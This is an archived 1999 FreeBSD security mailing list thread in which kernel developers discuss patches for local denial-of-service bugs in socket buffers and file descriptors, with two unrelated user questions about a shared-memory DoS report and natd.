From: "Brian F. Feldman" X-Sender: green@janus.syracuse.net To: Garrett Wollman Cc: Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <199909012046.QAA07324@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 1 Sep 1999, Garrett Wollman wrote: > < said: > > > One of the features I like about Unix is for example free space > > available solely to the root user. It could be imagined that these > > things also apply to file handles, memory/swap space and other scarce > > resources. > > We have known for some time that the problem originally described > exists, but developing an acceptable solution has been a challenge. > Now that sockets carry around user credentials, it may perhaps not be > as difficult as it used to be. > > What needs to be done is to impose a per-UID resource limit on the > amount of socket buffer space available. That's what peter and I came up with at least :) > > What's not clear is: > > 1) At what level do you impose this limit? Resource limit, definitely. > > 2) Should the limit be statistical or exact? Well, I have it exact it would seem. > > 3) What is a sensible default value? Whatever's in login.conf? :) Would you mind helping me out with http://www.FreeBSD.org/~green/sbsize2.patch? The KASSERT() fails in some cases, which I need help tracking down. > > -GAWollman > > -- > Garrett A. 
Wollman | O Siem / We are all family / O Siem / We're all the same > wollman@lcs.mit.edu | O Siem / The fires of freedom > Opinions not those of| Dance in the burning flame > MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! \ -- Rich Kulawiec / From owner-freebsd-security Sat Sep 4 17:49:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 0EAB91562D; Sat, 4 Sep 1999 17:49:09 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id RAA63733; Sat, 4 Sep 1999 17:48:41 -0700 (PDT) (envelope-from dillon) Date: Sat, 4 Sep 1999 17:48:41 -0700 (PDT)
From: Matthew Dillon Message-Id: <199909050048.RAA63733@apollo.backplane.com> To: "Brian F. Feldman" Cc: security@FreeBSD.ORG Subject: Re: another local DoS fix (PR ???) References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :I can't find the PR for it again (it was from will@iki.fi, supposedly) :for the problem, but this is something I have been working on : :crashopen.c and crashwrite.c had the ability to DoS a system easily. :I fixed crashopen.c with the addition of badfileops. Crashwrite.c and :other problems that could crop up like it are fixed by my patch up at : : http://www.FreeBSD.org/~green/fdfix2.patch : :Let me know how useful you find them. I'd like to get my diffs in :4.0 soon, since I've been running with them with no problems for :months, and they make FreeBSD more robust. Let me know what you :think, even if you don't try them, please :) : :-- : Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ I haven't run this patch, but I took a gander at it and it looks quite reasonable to me. There is one area of concern, not so much with the patch itself but the weakness that it reveals in the existing code. Most of the places you patch run the fo_*() op on the fp and then return, not using the fp again. Some, however, use the fp after the fo_*() function returns. I only see one place where this occurs, F_SETFL in kern/kern_descrip.c, and it's a degenerate case since the fcntl's in question typically do not block. - The proper way to deal with the fp stuff would probably be to make the getfp*() inline global and have it bump the ref count, then require the fp to be released. But this would require a considerable amount of rewriting to cleanup all the code so it may not be worth doing. kern/sys_generic.c has a static getfp() which takes an extra 'flags' argument while the rest of the kernel obtains the fp manually and typically without a test against flags. 
Rewriting the mess would also require all the 'return ( ... fo_* .... )' code in the switch statements to be converted to error = ... fo_* ... so the fp can be released in the outer code. If you did things this way you would then not bother writing inlines for the fo_*() functions but would instead keep the original function dispatch code. -Matt Matthew Dillon From owner-freebsd-security Sat Sep 4 18:11:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id EBCFB15051; Sat, 4 Sep 1999 18:11:08 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id SAA63819; Sat, 4 Sep 1999 18:10:13 -0700 (PDT) (envelope-from dillon) Date: Sat, 4 Sep 1999 18:10:13 -0700 (PDT)
From: Matthew Dillon Message-Id: <199909050110.SAA63819@apollo.backplane.com> To: "Brian F. Feldman" Cc: Garrett Wollman , Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : :Whatever's in login.conf? :) Would you mind helping me out with :http://www.FreeBSD.org/~green/sbsize2.patch? The KASSERT() fails :in some cases, which I need help tracking down. :... : Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ Hmmm. I see a problem, but it may not be the cause of your problem. 'ui_proccnt == 0 && ui_sbsize == 0' may not be sufficient to determine when a uip can be deleted, because a root process can change its uid (resulting in the old uip's proccnt possibly going to 0) and a socket buffer can be set to 0-length during a shutdown() operation, possibly causing ui_sbsize to go to zero. Thus both fields may end up zero, a reference to the uip may remain associated with the socket, and chgproccnt may free the underlying uip. I think what you need is a direct pointer reference to the uip from the socket. This would require a ui_refcount be kept on the uip, since ui_proccnt isn't really a general ref count in and of itself. I suspect that you may still hit the KASSERT, that there is something we are still missing, but this should help.
-Matt Matthew Dillon From owner-freebsd-security Sat Sep 4 18:12: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from c004.sfo.cp.net (c004-h005.c004.sfo.cp.net [209.228.14.76]) by hub.freebsd.org (Postfix) with SMTP id 9940D157B9 for ; Sat, 4 Sep 1999 18:11:59 -0700 (PDT) (envelope-from mistrM@socal.rr.com) Received: (cpmta 7503 invoked from network); 4 Sep 1999 18:11:32 -0700 Received: from 216-32-43-154.irv0.flashcom.net (HELO M2) (216.32.43.154) by smtp.flashcom.net with SMTP; 4 Sep 1999 18:11:32 -0700 X-Sent: 5 Sep 1999 01:11:32 GMT
From: Mr.M Reply-To: mistrM@socal.rr.com To: freebsd-security@freebsd.org Subject: Re: Local DoS in FreeBSD Date: Sat, 4 Sep 1999 18:05:55 -0700 X-Mailer: KMail [version 1.0.21] Content-Type: text/plain MIME-Version: 1.0 Message-Id: <99090418140301.23808@M2> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Please excuse me. With all the bugs, exploits, and vulnerabilities in the various programs and OSes I run I've gotten a little confused. The vulnerability you are discussing in this thread is called testsockbuf.c? Which was reported on Aug. 9th. If so, I must have missed it. My question is what about the Multiple Vendor Shared Memory Denial of Service Attack (vm-dos.c) that was posted on bugtraq on July 15? This supposedly affected all the BSDs and Linux. Has this been verified and patched? Any information on this would be greatly appreciated. Please correct me if anything I have posted is incorrect. TIA, Mario Paz From owner-freebsd-security Sat Sep 4 18:20:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 262F315668; Sat, 4 Sep 1999 18:20:45 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id SAA63930; Sat, 4 Sep 1999 18:20:37 -0700 (PDT) (envelope-from dillon) Date: Sat, 4 Sep 1999 18:20:37 -0700 (PDT)
From: Matthew Dillon Message-Id: <199909050120.SAA63930@apollo.backplane.com> To: "Brian F. Feldman" , Garrett Wollman , Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD References: <199909050110.SAA63819@apollo.backplane.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ::Whatever's in login.conf? :) Would you mind helping me out with ::http://www.FreeBSD.org/~green/sbsize2.patch? The KASSERT() fails ::in some cases, which I need help tracking down. ::... :: Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ : : Hmmm. I see a problem, but it may not be the cause of : your problem. 'ui_proccnt == 0 && ui_sbsize == 0' may not be : sufficient to determine when a uip can be deleted, because a root : process can change it's uid (resulting in the old uip's proccnt : possibly going to 0) and a socket buffer can be set to 0-length : during a shutdown() operation, possibly causing ui_sbsize to go to : zero. : : Thus both fields may end up zero, a reference to the uip : may remain associated with the socket, and chgproccnt may : free the underlying uip. : : I think what you need is a direct pointer reference to : the uip from the socket. This would require a ui_refcount : be kept on the uip, since ui_proccnt isn't really a : general ref count in of itself. : : I suspect that you may still hit the KASSERT, that there : is something we are still missing, but this should help. Oh wait, I don't know which KASSERT() you were referring to. If you were referring to the first one (uip != NULL), I think it can occur as I say. If it is referring to the second one, (uip->ui_sbsize >= 0), then I'm not sure. Either way I would get rid of chgsbsize() and instead change the chgproccnt() function to take a third argument, or make it even more general by passing a field type and a delta to allow it to be scaled to other things.
It may be as simple as the KASSERT winding up being wrong. I would also instrument the panic portion of the KASSERT to display more information, such as value of 'diff' and the old value of ui_sbsize when uip is not NULL. That may make the problem more obvious. -Matt From owner-freebsd-security Sat Sep 4 20:13: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 2FBB11500A; Sat, 4 Sep 1999 20:12:57 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id XAA26309; Sat, 4 Sep 1999 23:12:40 -0400 (EDT) (envelope-from wollman) Date: Sat, 4 Sep 1999 23:12:40 -0400 (EDT)
From: Garrett Wollman Message-Id: <199909050312.XAA26309@khavrinen.lcs.mit.edu> To: "Brian F. Feldman" Cc: freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: References: <199909012046.QAA07324@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: >> [I wrote:] >> What's not clear is: >> >> 1) At what level do you impose this limit? > Resource limit, definitely. You totally missed the point. >> 2) Should the limit be statistical or exact? > Well, I have it exact it would seem. So you clearly haven't actually thought about what the right answer is. >> 3) What is a sensible default value? > Whatever's in login.conf? Not at all helpful. > http://www.FreeBSD.org/~green/sbsize2.patch? The KASSERT() fails > in some cases, which I need help tracking down. I think if you're not going to implement the Right Thing, there's no sense adding all that complexity -- just make a per-socket limit, and require the sysadmin to tune his kernel to match the resource limits established. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick From owner-freebsd-security Sat Sep 4 23:47:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from pro.icp.ac.ru (pro.icp.ac.ru [193.233.43.46]) by hub.freebsd.org (Postfix) with ESMTP id 5A2C215355 for ; Sat, 4 Sep 1999 23:47:41 -0700 (PDT) (envelope-from ratebor@cityline.ru) Received: from vedi.pc.icp.ac.ru (vedi.pc.icp.ac.ru [192.168.253.19]) by pro.icp.ac.ru (8.9.3/8.8.7) with ESMTP id KAA85451 for ; Sun, 5 Sep 1999 10:47:35 +0400 (MSD) (envelope-from ratebor@cityline.ru) Date: Sun, 5 Sep 1999 10:44:06 +0400
From: "Dmitriy V. Bokiy" X-Mailer: The Bat! (v1.34a) UNREG / CD5BF9353B3B7091 Reply-To: "Dmitriy V. Bokiy" X-Priority: 3 (Normal) Message-ID: <1447.990905@cityline.ru> To: freebsd-security@FreeBSD.ORG Subject: newbie: natd Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From natd(8): "-deny_incoming | -d Reject packets destined for the current IP number that have no entry in the internal translation table." My question is what packets are affected by this option? Packets with public addresses (I mean this scheme: Internet-->router(ipfw+NAT)-->subnet1(public addresses)-->router(ipfw)-->subnet2(reserved addresses))? --Dmitriy P.S. Sorry if it's a dull question.